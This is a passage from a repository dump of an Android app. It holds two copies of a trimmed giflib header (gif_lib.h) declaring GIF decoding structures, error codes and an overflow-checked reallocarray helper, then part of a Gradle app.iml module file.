 72 | #define GIF_VERSION_POS 3           /* Version first character in stamp. */
 73 | 
 74 | typedef unsigned char GifPixelType;
 75 | typedef unsigned char GifByteType;
 76 | typedef unsigned int GifPrefixType;
 77 | typedef uint_fast16_t GifWord;
 78 | 
 79 | typedef struct GifColorType {
 80 | 	uint8_t Red, Green, Blue;
 81 | } GifColorType;
 82 | 
 83 | typedef struct ColorMapObject {
 84 | 	uint_fast16_t ColorCount;
 85 | 	uint_fast8_t BitsPerPixel;
 86 | //    bool SortFlag;
 87 | 	GifColorType *Colors;    /* on malloc(3) heap */
 88 | } ColorMapObject;
 89 | 
 90 | typedef struct GifImageDesc {
 91 | 	GifWord Left, Top, Width, Height;   /* Current image dimensions. */
 92 | 	bool Interlace;
 93 | 	/* Sequential/Interlaced lines. */
 94 | 	ColorMapObject *ColorMap;           /* The local color map */
 95 | } GifImageDesc;
 96 | 
 97 | //typedef struct ExtensionBlock {
 98 | //    int ByteCount;
 99 | //    GifByteType *Bytes; /* on malloc(3) heap */
100 | //    int Function;       /* The block function code */
101 | #define CONTINUE_EXT_FUNC_CODE    0x00    /* continuation subblock */
102 | #define COMMENT_EXT_FUNC_CODE     0xfe    /* comment */
103 | #define GRAPHICS_EXT_FUNC_CODE    0xf9    /* graphics control (GIF89) */
104 | #define PLAINTEXT_EXT_FUNC_CODE   0x01    /* plaintext */
105 | #define APPLICATION_EXT_FUNC_CODE 0xff    /* application block */
106 | //} ExtensionBlock;
107 | 
108 | typedef struct SavedImage {
109 | 	GifImageDesc ImageDesc;
110 | //    GifByteType *RasterBits;         /* on malloc(3) heap */
111 | //    int ExtensionBlockCount;         /* Count of extensions before image */
112 | //    ExtensionBlock *ExtensionBlocks; /* Extensions before image */
113 | } SavedImage;
114 | 
115 | #define EXTENSION_INTRODUCER      0x21
116 | #define DESCRIPTOR_INTRODUCER     0x2c
117 | #define TERMINATOR_INTRODUCER     0x3b
118 | 
119 | #define LZ_MAX_CODE         4095    /* Biggest code possible in 12 bits. */
120 | #define LZ_BITS             12
121 | 
122 | #define FLUSH_OUTPUT        4096    /* Impossible code, to signal flush. */
123 | #define FIRST_CODE          4097    /* Impossible code, to signal first. */
124 | #define NO_SUCH_CODE        4098    /* Impossible code, to signal empty. */
125 | 
126 | //#define FILE_STATE_WRITE    0x01
127 | //#define FILE_STATE_SCREEN   0x02
128 | //#define FILE_STATE_IMAGE    0x04
129 | //#define FILE_STATE_READ     0x08
130 | 
131 | //#define IS_READABLE(Private)    (Private->FileState & FILE_STATE_READ)
132 | 
133 | 
134 | struct GifFileType;
135 | /* func type to read gif data from arbitrary sources (TVT) */
136 | typedef uint_fast8_t (*InputFunc)(struct GifFileType *, GifByteType *, uint_fast8_t);
137 | 
138 | typedef struct GifFilePrivateType {
139 | 	GifWord //FileState, /*FileHandle,*/  /* Where all this data goes to! */
140 | 			BitsPerPixel,     /* Bits per pixel (Codes uses at least this + 1). */
141 | 			ClearCode,   /* The CLEAR LZ code. */
142 | 			EOFCode,     /* The EOF LZ code. */
143 | 			RunningCode, /* The next code algorithm can generate. */
144 | 			RunningBits, /* The number of bits required to represent RunningCode. */
145 | 			MaxCode1,    /* 1 bigger than max. possible code, in RunningBits bits. */
146 | 			LastCode,    /* The code before the current code. */
147 |             CrntCode,    /* Current algorithm code. */
148 | 			StackPtr,    /* For character stack (see below). */
149 | 			CrntShiftState;
150 | 	/* Number of bits in CrntShiftDWord. */
151 | 	unsigned long CrntShiftDWord;
152 | 	/* For bytes decomposition into codes. */
153 | 	uint_fast32_t PixelCount;
154 | 	/* Number of pixels in image. */
155 | //    FILE *File;
156 | 	/* File as stream. */
157 | 	InputFunc Read;     /* function to read gif input (TVT) */
158 | //    OutputFunc Write;   /* function to write gif output (MRB) */
159 | 	GifByteType Buf[256];
160 | 	unsigned char OutBuf[500];
161 | 	int OutBufLen;
162 | 	/* Compressed input is buffered here. */
163 | 	GifByteType Stack[LZ_MAX_CODE];
164 | 	/* Decoded pixels are stacked here. */
165 | 	GifByteType Suffix[LZ_MAX_CODE + 1];
166 | 	/* So we can trace the codes. */
167 | 	GifPrefixType Prefix[LZ_MAX_CODE + 1];
168 | //    bool gif89;
169 | } GifFilePrivateType;
170 | 
171 | typedef struct GifFileType {
172 | 	GifWord SWidth, SHeight;         /* Size of virtual canvas */
173 | //    GifWord SColorResolution;        /* How many colors can we generate? */
174 | 	GifWord SBackGroundColor;        /* Background color for virtual canvas */
175 | //    GifByteType AspectByte;	     /* Used to compute pixel aspect ratio */
176 | 	ColorMapObject *SColorMap;
177 | 	/* Global colormap, NULL if nonexistent. */
178 | 	uint_fast32_t ImageCount;
179 | 	/* Number of current image (both APIs) */
180 | 	GifImageDesc Image;
181 | 	/* Current image (low-level API) */
182 | 	SavedImage *SavedImages;         /* Image sequence (high-level API) */
183 | //    int ExtensionBlockCount;         /* Count extensions past last image */
184 | //    ExtensionBlock *ExtensionBlocks; /* Extensions past last image */
185 | 	int Error;
186 | 	/* Last error condition reported */
187 | 	void *UserData;
188 | 	/* hook to attach user data (TVT) */
189 | 	GifFilePrivateType *Private;                   /* Don't mess with this! */
190 | } GifFileType;
191 | 
192 | //#define GIF_ASPECT_RATIO(n)    ((n)+15.0/64.0)
193 | 
194 | typedef enum {
195 | 	UNDEFINED_RECORD_TYPE,
196 | 	SCREEN_DESC_RECORD_TYPE,
197 | 	IMAGE_DESC_RECORD_TYPE, /* Begin with ',' */
198 | 			EXTENSION_RECORD_TYPE, /* Begin with '!' */
199 | 			TERMINATE_RECORD_TYPE   /* Begin with ';' */
200 | } GifRecordType;
201 | 
202 | /* func type to read gif data from arbitrary sources (TVT) */
203 | typedef uint_fast8_t (*InputFunc)(GifFileType *, GifByteType *, uint_fast8_t);
204 | 
205 | /******************************************************************************
206 |  GIF89 structures
207 | ******************************************************************************/
208 | 
209 | typedef struct GraphicsControlBlock {
210 | 	uint_fast8_t DisposalMode;
211 | #define DISPOSAL_UNSPECIFIED      0       /* No disposal specified. */
212 | #define DISPOSE_DO_NOT            1       /* Leave image in place */
213 | #define DISPOSE_BACKGROUND        2       /* Set area too background color */
214 | #define DISPOSE_PREVIOUS          3       /* Restore to previous content */
215 | //    bool UserInputFlag;      /* User confirmation required before disposal */
216 | 	uint_fast32_t DelayTime;
217 | 	/* pre-display delay in 0.01sec units */
218 | 	int TransparentColor;    /* Palette index for transparency, -1 if none */
219 | #define NO_TRANSPARENT_COLOR    -1
220 | } GraphicsControlBlock;
221 | 
222 | /******************************************************************************
223 |  GIF decoding routines
224 | ******************************************************************************/
225 | 
226 | /* Main entry points */
227 | GifFileType *DGifOpen(void *userPtr, InputFunc readFunc, int *Error);
228 | 
229 | /* new one (TVT) */
230 | int DGifCloseFile(GifFileType *GifFile);
231 | 
232 | #define D_GIF_ERR_OPEN_FAILED    101    /* And DGif possible errors. */
233 | #define D_GIF_ERR_READ_FAILED    102
234 | #define D_GIF_ERR_NOT_GIF_FILE   103
235 | #define D_GIF_ERR_NO_SCRN_DSCR   104
236 | #define D_GIF_ERR_NO_IMAG_DSCR   105
237 | #define D_GIF_ERR_NO_COLOR_MAP   106
238 | #define D_GIF_ERR_WRONG_RECORD   107
239 | #define D_GIF_ERR_DATA_TOO_BIG   108
240 | #define D_GIF_ERR_NOT_ENOUGH_MEM 109
241 | #define D_GIF_ERR_CLOSE_FAILED   110
242 | #define D_GIF_ERR_NOT_READABLE   111
243 | #define D_GIF_ERR_IMAGE_DEFECT   112
244 | #define D_GIF_ERR_EOF_TOO_SOON   113
245 | 
246 | #define E_GIF_SUCCEEDED          0
247 | #define E_GIF_ERR_OPEN_FAILED    1    /* And EGif possible errors. */
248 | #define E_GIF_ERR_WRITE_FAILED   2
249 | #define E_GIF_ERR_HAS_SCRN_DSCR  3
250 | #define E_GIF_ERR_HAS_IMAG_DSCR  4
251 | #define E_GIF_ERR_NO_COLOR_MAP   5
252 | #define E_GIF_ERR_DATA_TOO_BIG   6
253 | #define E_GIF_ERR_NOT_ENOUGH_MEM 7
254 | #define E_GIF_ERR_DISK_IS_FULL   8
255 | #define E_GIF_ERR_CLOSE_FAILED   9
256 | #define E_GIF_ERR_NOT_WRITEABLE  10
257 | 
258 | /* These are legacy.  You probably do not want to call them directly */
259 | int DGifGetScreenDesc(GifFileType *GifFile);
260 | 
261 | int DGifGetRecordType(GifFileType *GifFile, GifRecordType *GifType);
262 | 
263 | int DGifGetImageDesc(GifFileType *GifFile, bool changeImageCount);
264 | 
265 | int DGifGetLine(GifFileType *GifFile, GifPixelType *GifLine, uint_fast32_t GifLineLen);
266 | 
267 | int DGifGetExtension(GifFileType *GifFile, int *GifExtCode,
268 |                      GifByteType **GifExtension);
269 | 
270 | int DGifGetExtensionNext(GifFileType *GifFile, GifByteType **GifExtension);
271 | 
272 | int DGifGetCodeNext(GifFileType *GifFile, GifByteType **GifCodeBlock);
273 | 
274 | int EGifCompressLine(GifFilePrivateType *Private, unsigned char *Line, const int LineLen);
275 | /*****************************************************************************
276 |  Everything below this point is new after version 1.2, supporting `slurp
277 |  mode' for doing I/O in two big belts with all the image-bashing in core.
278 | ******************************************************************************/
279 | 
280 | /******************************************************************************
281 |  Color map handling from gif_alloc.c
282 | ******************************************************************************/
283 | 
284 | extern ColorMapObject *GifMakeMapObject(uint_fast8_t BitsPerPixel,
285 |                                         const GifColorType *ColorMap);
286 | 
287 | extern void GifFreeMapObject(ColorMapObject *Object);
288 | 
289 | //extern int GifBitSize(int n);
290 | #include <sys/types.h>
291 | #include <errno.h>
292 | #include <stdlib.h>
293 | #include <limits.h>
294 | 
295 | /******************************************************************************
296 |  Support for the in-core structures allocation (slurp mode).              
297 | ******************************************************************************/
298 | 
299 | //extern void GifFreeExtensions(int *ExtensionBlock_Count,
300 | //			      ExtensionBlock **ExtensionBlocks);
301 | extern void GifFreeSavedImages(GifFileType *GifFile);
302 | 
303 | /******************************************************************************
304 |  5.x functions for GIF89 graphics control blocks
305 | ******************************************************************************/
306 | 
307 | int DGifExtensionToGCB(const size_t GifExtensionLength,
308 |                        const GifByteType *GifExtension,
309 |                        GraphicsControlBlock *GCB);
310 | 
311 | #endif /* _GIF_LIB_H */
312 | 
313 | /* end */
314 | 


--------------------------------------------------------------------------------
/MyApplication2/app/src/main/cpp/gif/gif_lib.h:
--------------------------------------------------------------------------------
  1 | /******************************************************************************
  2 |  
  3 | gif_lib.h - service library for decoding and encoding GIF images
  4 |                                                                              
  5 | *****************************************************************************/
  6 | 
  7 | #ifndef _GIF_LIB_H_
  8 | #define _GIF_LIB_H_ 1
  9 | 
 10 | #define GIF_ERROR   0
 11 | #define GIF_OK      1
 12 | 
 13 | #include <stddef.h>
 14 | #include <stdbool.h>
 15 | 
 16 | #include <android/log.h>
 17 | #define  LOG_TAG    "libgif"
 18 | #define  LOGE(...)  __android_log_print(ANDROID_LOG_ERROR,LOG_TAG,__VA_ARGS__)
 19 | 
 20 | typedef signed char __int8_t;
 21 | typedef unsigned char __uint8_t;
 22 | typedef short __int16_t;
 23 | typedef unsigned short __uint16_t;
 24 | typedef int __int32_t;
 25 | typedef unsigned int __uint32_t;
 26 | #if defined(__LP64__)
 27 | typedef long __int64_t;
 28 | typedef unsigned long __uint64_t;
 29 | #else
 30 | typedef long long __int64_t;
 31 | typedef unsigned long long __uint64_t;
 32 | #endif
 33 | #if defined(__LP64__)
 34 | typedef long __intptr_t;
 35 | typedef unsigned long __uintptr_t;
 36 | #else
 37 | typedef int __intptr_t;
 38 | typedef unsigned int __uintptr_t;
 39 | #endif
 40 | typedef __int8_t      int8_t;
 41 | typedef __uint8_t     uint8_t;
 42 | typedef __int16_t     int16_t;
 43 | typedef __uint16_t    uint16_t;
 44 | typedef __int32_t     int32_t;
 45 | typedef __uint32_t    uint32_t;
 46 | typedef __int64_t     int64_t;
 47 | typedef __uint64_t    uint64_t;
 48 | typedef __intptr_t    intptr_t;
 49 | typedef __uintptr_t   uintptr_t;
 50 | typedef int8_t        int_least8_t;
 51 | typedef uint8_t       uint_least8_t;
 52 | typedef int16_t       int_least16_t;
 53 | typedef uint16_t      uint_least16_t;
 54 | typedef int32_t       int_least32_t;
 55 | typedef uint32_t      uint_least32_t;
 56 | typedef int64_t       int_least64_t;
 57 | typedef uint64_t      uint_least64_t;
 58 | typedef int8_t        int_fast8_t;
 59 | typedef uint8_t       uint_fast8_t;
 60 | typedef int64_t       int_fast64_t;
 61 | typedef uint64_t      uint_fast64_t;
 62 | #if defined(__LP64__)
 63 | typedef int64_t       int_fast16_t;
 64 | typedef uint64_t      uint_fast16_t;
 65 | typedef int64_t       int_fast32_t;
 66 | typedef uint64_t      uint_fast32_t;
 67 | #else
 68 | typedef int32_t       int_fast16_t;
 69 | typedef uint32_t      uint_fast16_t;
 70 | typedef int32_t       int_fast32_t;
 71 | typedef uint32_t      uint_fast32_t;
 72 | #endif
 73 | 
 74 | #define GIF_STAMP "GIFVER"          /* First chars in file - GIF stamp.  */
 75 | #define GIF_STAMP_LEN sizeof(GIF_STAMP) - 1
 76 | #define GIF_VERSION_POS 3           /* Version first character in stamp. */
 77 | 
 78 | typedef unsigned char GifPixelType;
 79 | typedef unsigned char GifByteType;
 80 | typedef unsigned int GifPrefixType;
 81 | typedef uint_fast16_t GifWord;
 82 | 
 83 | typedef struct GifColorType {
 84 | 	uint8_t Red, Green, Blue;
 85 | } GifColorType;
 86 | 
 87 | typedef struct ColorMapObject {
 88 | 	uint_fast16_t ColorCount;
 89 | 	uint_fast8_t BitsPerPixel;
 90 | //    bool SortFlag;
 91 | 	GifColorType *Colors;    /* on malloc(3) heap */
 92 | } ColorMapObject;
 93 | 
 94 | typedef struct GifImageDesc {
 95 | 	GifWord Left, Top, Width, Height;   /* Current image dimensions. */
 96 | 	bool Interlace;
 97 | 	/* Sequential/Interlaced lines. */
 98 | 	ColorMapObject *ColorMap;           /* The local color map */
 99 | } GifImageDesc;
100 | 
101 | //typedef struct ExtensionBlock {
102 | //    int ByteCount;
103 | //    GifByteType *Bytes; /* on malloc(3) heap */
104 | //    int Function;       /* The block function code */
105 | #define CONTINUE_EXT_FUNC_CODE    0x00    /* continuation subblock */
106 | #define COMMENT_EXT_FUNC_CODE     0xfe    /* comment */
107 | #define GRAPHICS_EXT_FUNC_CODE    0xf9    /* graphics control (GIF89) */
108 | #define PLAINTEXT_EXT_FUNC_CODE   0x01    /* plaintext */
109 | #define APPLICATION_EXT_FUNC_CODE 0xff    /* application block */
110 | //} ExtensionBlock;
111 | 
112 | typedef struct SavedImage {
113 | 	GifImageDesc ImageDesc;
114 | //    GifByteType *RasterBits;         /* on malloc(3) heap */
115 | //    int ExtensionBlockCount;         /* Count of extensions before image */
116 | //    ExtensionBlock *ExtensionBlocks; /* Extensions before image */
117 | } SavedImage;
118 | 
119 | #define EXTENSION_INTRODUCER      0x21
120 | #define DESCRIPTOR_INTRODUCER     0x2c
121 | #define TERMINATOR_INTRODUCER     0x3b
122 | 
123 | #define LZ_MAX_CODE         4095    /* Biggest code possible in 12 bits. */
124 | #define LZ_BITS             12
125 | 
126 | #define FLUSH_OUTPUT        4096    /* Impossible code, to signal flush. */
127 | #define FIRST_CODE          4097    /* Impossible code, to signal first. */
128 | #define NO_SUCH_CODE        4098    /* Impossible code, to signal empty. */
129 | 
130 | //#define FILE_STATE_WRITE    0x01
131 | //#define FILE_STATE_SCREEN   0x02
132 | //#define FILE_STATE_IMAGE    0x04
133 | //#define FILE_STATE_READ     0x08
134 | 
135 | //#define IS_READABLE(Private)    (Private->FileState & FILE_STATE_READ)
136 | 
137 | 
138 | struct GifFileType;
139 | /* func type to read gif data from arbitrary sources (TVT) */
140 | typedef uint_fast8_t (*InputFunc)(struct GifFileType *, GifByteType *, uint_fast8_t);
141 | 
142 | typedef struct GifFilePrivateType {
143 | 	GifWord //FileState, /*FileHandle,*/  /* Where all this data goes to! */
144 | 			BitsPerPixel,     /* Bits per pixel (Codes uses at least this + 1). */
145 | 			ClearCode,   /* The CLEAR LZ code. */
146 | 			EOFCode,     /* The EOF LZ code. */
147 | 			RunningCode, /* The next code algorithm can generate. */
148 | 			RunningBits, /* The number of bits required to represent RunningCode. */
149 | 			MaxCode1,    /* 1 bigger than max. possible code, in RunningBits bits. */
150 | 			LastCode,    /* The code before the current code. */
151 |             CrntCode,    /* Current algorithm code. */
152 | 			StackPtr,    /* For character stack (see below). */
153 | 			CrntShiftState;
154 | 	/* Number of bits in CrntShiftDWord. */
155 | 	unsigned long CrntShiftDWord;
156 | 	/* For bytes decomposition into codes. */
157 | 	uint_fast32_t PixelCount;
158 | 	/* Number of pixels in image. */
159 | //    FILE *File;
160 | 	/* File as stream. */
161 | 	InputFunc Read;     /* function to read gif input (TVT) */
162 | //    OutputFunc Write;   /* function to write gif output (MRB) */
163 | 	GifByteType Buf[256];
164 | 	unsigned char OutBuf[500];
165 | 	int OutBufLen;
166 | 	/* Compressed input is buffered here. */
167 | 	GifByteType Stack[LZ_MAX_CODE];
168 | 	/* Decoded pixels are stacked here. */
169 | 	GifByteType Suffix[LZ_MAX_CODE + 1];
170 | 	/* So we can trace the codes. */
171 | 	GifPrefixType Prefix[LZ_MAX_CODE + 1];
172 | //    bool gif89;
173 | } GifFilePrivateType;
174 | 
175 | typedef struct GifFileType {
176 | 	GifWord SWidth, SHeight;         /* Size of virtual canvas */
177 | //    GifWord SColorResolution;        /* How many colors can we generate? */
178 | 	GifWord SBackGroundColor;        /* Background color for virtual canvas */
179 | //    GifByteType AspectByte;	     /* Used to compute pixel aspect ratio */
180 | 	ColorMapObject *SColorMap;
181 | 	/* Global colormap, NULL if nonexistent. */
182 | 	uint_fast32_t ImageCount;
183 | 	/* Number of current image (both APIs) */
184 | 	GifImageDesc Image;
185 | 	/* Current image (low-level API) */
186 | 	SavedImage *SavedImages;         /* Image sequence (high-level API) */
187 | //    int ExtensionBlockCount;         /* Count extensions past last image */
188 | //    ExtensionBlock *ExtensionBlocks; /* Extensions past last image */
189 | 	int Error;
190 | 	/* Last error condition reported */
191 | 	void *UserData;
192 | 	/* hook to attach user data (TVT) */
193 | 	GifFilePrivateType *Private;                   /* Don't mess with this! */
194 | } GifFileType;
195 | 
196 | //#define GIF_ASPECT_RATIO(n)    ((n)+15.0/64.0)
197 | 
198 | typedef enum {
199 | 	UNDEFINED_RECORD_TYPE,
200 | 	SCREEN_DESC_RECORD_TYPE,
201 | 	IMAGE_DESC_RECORD_TYPE, /* Begin with ',' */
202 | 			EXTENSION_RECORD_TYPE, /* Begin with '!' */
203 | 			TERMINATE_RECORD_TYPE   /* Begin with ';' */
204 | } GifRecordType;
205 | 
206 | /* func type to read gif data from arbitrary sources (TVT) */
207 | typedef uint_fast8_t (*InputFunc)(GifFileType *, GifByteType *, uint_fast8_t);
208 | 
209 | /******************************************************************************
210 |  GIF89 structures
211 | ******************************************************************************/
212 | 
213 | typedef struct GraphicsControlBlock {
214 | 	uint_fast8_t DisposalMode;
215 | #define DISPOSAL_UNSPECIFIED      0       /* No disposal specified. */
216 | #define DISPOSE_DO_NOT            1       /* Leave image in place */
217 | #define DISPOSE_BACKGROUND        2       /* Set area too background color */
218 | #define DISPOSE_PREVIOUS          3       /* Restore to previous content */
219 | //    bool UserInputFlag;      /* User confirmation required before disposal */
220 | 	uint_fast32_t DelayTime;
221 | 	/* pre-display delay in 0.01sec units */
222 | 	int TransparentColor;    /* Palette index for transparency, -1 if none */
223 | #define NO_TRANSPARENT_COLOR    -1
224 | } GraphicsControlBlock;
225 | 
226 | /******************************************************************************
227 |  GIF decoding routines
228 | ******************************************************************************/
229 | 
230 | /* Main entry points */
231 | GifFileType *DGifOpen(void *userPtr, InputFunc readFunc, int *Error);
232 | 
233 | /* new one (TVT) */
234 | int DGifCloseFile(GifFileType *GifFile);
235 | 
236 | #define D_GIF_ERR_OPEN_FAILED    101    /* And DGif possible errors. */
237 | #define D_GIF_ERR_READ_FAILED    102
238 | #define D_GIF_ERR_NOT_GIF_FILE   103
239 | #define D_GIF_ERR_NO_SCRN_DSCR   104
240 | #define D_GIF_ERR_NO_IMAG_DSCR   105
241 | #define D_GIF_ERR_NO_COLOR_MAP   106
242 | #define D_GIF_ERR_WRONG_RECORD   107
243 | #define D_GIF_ERR_DATA_TOO_BIG   108
244 | #define D_GIF_ERR_NOT_ENOUGH_MEM 109
245 | #define D_GIF_ERR_CLOSE_FAILED   110
246 | #define D_GIF_ERR_NOT_READABLE   111
247 | #define D_GIF_ERR_IMAGE_DEFECT   112
248 | #define D_GIF_ERR_EOF_TOO_SOON   113
249 | 
250 | #define E_GIF_SUCCEEDED          0
251 | #define E_GIF_ERR_OPEN_FAILED    1    /* And EGif possible errors. */
252 | #define E_GIF_ERR_WRITE_FAILED   2
253 | #define E_GIF_ERR_HAS_SCRN_DSCR  3
254 | #define E_GIF_ERR_HAS_IMAG_DSCR  4
255 | #define E_GIF_ERR_NO_COLOR_MAP   5
256 | #define E_GIF_ERR_DATA_TOO_BIG   6
257 | #define E_GIF_ERR_NOT_ENOUGH_MEM 7
258 | #define E_GIF_ERR_DISK_IS_FULL   8
259 | #define E_GIF_ERR_CLOSE_FAILED   9
260 | #define E_GIF_ERR_NOT_WRITEABLE  10
261 | 
262 | /* These are legacy.  You probably do not want to call them directly */
263 | int DGifGetScreenDesc(GifFileType *GifFile);
264 | 
265 | int DGifGetRecordType(GifFileType *GifFile, GifRecordType *GifType);
266 | 
267 | int DGifGetImageDesc(GifFileType *GifFile, bool changeImageCount);
268 | 
269 | int DGifGetLine(GifFileType *GifFile, GifPixelType *GifLine, uint_fast32_t GifLineLen);
270 | 
271 | int DGifGetExtension(GifFileType *GifFile, int *GifExtCode,
272 |                      GifByteType **GifExtension);
273 | 
274 | int DGifGetExtensionNext(GifFileType *GifFile, GifByteType **GifExtension);
275 | 
276 | int DGifGetCodeNext(GifFileType *GifFile, GifByteType **GifCodeBlock);
277 | 
278 | int EGifCompressLine(GifFilePrivateType *Private, unsigned char *Line, const int LineLen);
279 | /*****************************************************************************
280 |  Everything below this point is new after version 1.2, supporting `slurp
281 |  mode' for doing I/O in two big belts with all the image-bashing in core.
282 | ******************************************************************************/
283 | 
284 | /******************************************************************************
285 |  Color map handling from gif_alloc.c
286 | ******************************************************************************/
287 | 
288 | extern ColorMapObject *GifMakeMapObject(uint_fast8_t BitsPerPixel,
289 |                                         const GifColorType *ColorMap);
290 | 
291 | extern void GifFreeMapObject(ColorMapObject *Object);
292 | 
293 | //extern int GifBitSize(int n);
294 | #include <sys/types.h>
295 | #include <errno.h>
296 | #include <stdlib.h>
297 | #include <limits.h>
298 | 
299 | /*
300 |  * This is sqrt(SIZE_MAX+1), as s1*s2 <= SIZE_MAX
301 |  * if both s1 < MUL_NO_OVERFLOW and s2 < MUL_NO_OVERFLOW
302 |  */
303 | #define MUL_NO_OVERFLOW    ((size_t)1 << (sizeof(size_t) * 4))
304 | 
305 | __attribute__((always_inline))
306 | static void *reallocarray(void *optr, size_t nmemb, size_t size) {
307 | 	if ((nmemb >= MUL_NO_OVERFLOW || size >= MUL_NO_OVERFLOW) &&
308 | 		nmemb > 0 && SIZE_MAX / nmemb < size) {
309 | 		errno = ENOMEM;
310 | 		return NULL;
311 | 	}
312 | 	void *ret = realloc(optr, size * nmemb);
313 |     LOGE("reallocarray(%p, %d) %p", optr, nmemb, ret);
314 |     return ret;
315 | }
316 | 
317 | /******************************************************************************
318 |  Support for the in-core structures allocation (slurp mode).              
319 | ******************************************************************************/
320 | 
321 | //extern void GifFreeExtensions(int *ExtensionBlock_Count,
322 | //			      ExtensionBlock **ExtensionBlocks);
323 | extern void GifFreeSavedImages(GifFileType *GifFile);
324 | 
325 | /******************************************************************************
326 |  5.x functions for GIF89 graphics control blocks
327 | ******************************************************************************/
328 | 
329 | int DGifExtensionToGCB(const size_t GifExtensionLength,
330 |                        const GifByteType *GifExtension,
331 |                        GraphicsControlBlock *GCB);
332 | 
333 | #endif /* _GIF_LIB_H */
334 | 
335 | /* end */
336 | 


--------------------------------------------------------------------------------
/MyApplication2/app/app.iml:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="UTF-8"?>
  2 | <module external.linked.project.id=":app" external.linked.project.path="$MODULE_DIR$" external.root.project.path="$MODULE_DIR$/.." external.system.id="GRADLE" type="JAVA_MODULE" version="4">
  3 |   <component name="FacetManager">
  4 |     <facet type="android-gradle" name="Android-Gradle">
  5 |       <configuration>
  6 |         <option name="GRADLE_PROJECT_PATH" value=":app" />
  7 |         <option name="LAST_SUCCESSFUL_SYNC_AGP_VERSION" value="3.5.0" />
  8 |         <option name="LAST_KNOWN_AGP_VERSION" value="3.5.0" />
  9 |       </configuration>
 10 |     </facet>
 11 |     <facet type="android" name="Android">
 12 |       <configuration>
 13 |         <option name="SELECTED_BUILD_VARIANT" value="debug" />
 14 |         <option name="ASSEMBLE_TASK_NAME" value="assembleDebug" />
 15 |         <option name="COMPILE_JAVA_TASK_NAME" value="compileDebugSources" />
 16 |         <afterSyncTasks>
 17 |           <task>generateDebugSources</task>
 18 |         </afterSyncTasks>
 19 |         <option name="ALLOW_USER_CONFIGURATION" value="false" />
 20 |         <option name="MANIFEST_FILE_RELATIVE_PATH" value="/src/main/AndroidManifest.xml" />
 21 |         <option name="RES_FOLDER_RELATIVE_PATH" value="/src/main/res" />
 22 |         <option name="RES_FOLDERS_RELATIVE_PATH" value="file://$MODULE_DIR$/src/main/res" />
 23 |         <option name="TEST_RES_FOLDERS_RELATIVE_PATH" value="" />
 24 |         <option name="ASSETS_FOLDER_RELATIVE_PATH" value="/src/main/assets" />
 25 |       </configuration>
 26 |     </facet>
 27 |     <facet type="native-android-gradle" name="Native-Android-Gradle">
 28 |       <configuration>
 29 |         <option name="SELECTED_BUILD_VARIANT" value="debug-arm64-v8a" />
 30 |       </configuration>
 31 |     </facet>
 32 |   </component>
 33 |   <component name="NewModuleRootManager" LANGUAGE_LEVEL="JDK_1_7">
 34 |     <output url="file://$MODULE_DIR$/build/intermediates/javac/debug/classes" />
 35 |     <output-test url="file://$MODULE_DIR$/build/intermediates/javac/debugUnitTest/classes" />
 36 |     <exclude-output />
 37 |     <content url="file://$MODULE_DIR$">
 38 |       <sourceFolder url="file://$MODULE_DIR$/src/main/cpp/gif" isTestSource="false" />
 39 |       <sourceFolder url="file://$MODULE_DIR$/build/generated/ap_generated_sources/debug/out" isTestSource="false" generated="true" />
 40 |       <sourceFolder url="file://$MODULE_DIR$/build/generated/aidl_source_output_dir/debug/compileDebugAidl/out" isTestSource="false" generated="true" />
 41 |       <sourceFolder url="file://$MODULE_DIR$/build/generated/source/buildConfig/debug" isTestSource="false" generated="true" />
 42 |       <sourceFolder url="file://$MODULE_DIR$/build/generated/renderscript_source_output_dir/debug/compileDebugRenderscript/out" isTestSource="false" generated="true" />
 43 |       <sourceFolder url="file://$MODULE_DIR$/build/generated/res/rs/debug" type="java-resource" generated="true" />
 44 |       <sourceFolder url="file://$MODULE_DIR$/build/generated/res/resValues/debug" type="java-resource" generated="true" />
 45 |       <sourceFolder url="file://$MODULE_DIR$/build/generated/ap_generated_sources/debugAndroidTest/out" isTestSource="true" generated="true" />
 46 |       <sourceFolder url="file://$MODULE_DIR$/build/generated/aidl_source_output_dir/debugAndroidTest/compileDebugAndroidTestAidl/out" isTestSource="true" generated="true" />
 47 |       <sourceFolder url="file://$MODULE_DIR$/build/generated/source/buildConfig/androidTest/debug" isTestSource="true" generated="true" />
 48 |       <sourceFolder url="file://$MODULE_DIR$/build/generated/renderscript_source_output_dir/debugAndroidTest/compileDebugAndroidTestRenderscript/out" isTestSource="true" generated="true" />
 49 |       <sourceFolder url="file://$MODULE_DIR$/build/generated/res/rs/androidTest/debug" type="java-test-resource" generated="true" />
 50 |       <sourceFolder url="file://$MODULE_DIR$/build/generated/res/resValues/androidTest/debug" type="java-test-resource" generated="true" />
 51 |       <sourceFolder url="file://$MODULE_DIR$/build/generated/ap_generated_sources/debugUnitTest/out" isTestSource="true" generated="true" />
 52 |       <sourceFolder url="file://$MODULE_DIR$/src/debug/res" type="java-resource" />
 53 |       <sourceFolder url="file://$MODULE_DIR$/src/debug/resources" type="java-resource" />
 54 |       <sourceFolder url="file://$MODULE_DIR$/src/debug/assets" type="java-resource" />
 55 |       <sourceFolder url="file://$MODULE_DIR$/src/debug/aidl" isTestSource="false" />
 56 |       <sourceFolder url="file://$MODULE_DIR$/src/debug/java" isTestSource="false" />
 57 |       <sourceFolder url="file://$MODULE_DIR$/src/debug/jni" isTestSource="false" />
 58 |       <sourceFolder url="file://$MODULE_DIR$/src/debug/rs" isTestSource="false" />
 59 |       <sourceFolder url="file://$MODULE_DIR$/src/debug/shaders" isTestSource="false" />
 60 |       <sourceFolder url="file://$MODULE_DIR$/src/androidTestDebug/res" type="java-test-resource" />
 61 |       <sourceFolder url="file://$MODULE_DIR$/src/androidTestDebug/resources" type="java-test-resource" />
 62 |       <sourceFolder url="file://$MODULE_DIR$/src/androidTestDebug/assets" type="java-test-resource" />
 63 |       <sourceFolder url="file://$MODULE_DIR$/src/androidTestDebug/aidl" isTestSource="true" />
 64 |       <sourceFolder url="file://$MODULE_DIR$/src/androidTestDebug/java" isTestSource="true" />
 65 |       <sourceFolder url="file://$MODULE_DIR$/src/androidTestDebug/jni" isTestSource="true" />
 66 |       <sourceFolder url="file://$MODULE_DIR$/src/androidTestDebug/rs" isTestSource="true" />
 67 |       <sourceFolder url="file://$MODULE_DIR$/src/androidTestDebug/shaders" isTestSource="true" />
 68 |       <sourceFolder url="file://$MODULE_DIR$/src/testDebug/res" type="java-test-resource" />
 69 |       <sourceFolder url="file://$MODULE_DIR$/src/testDebug/resources" type="java-test-resource" />
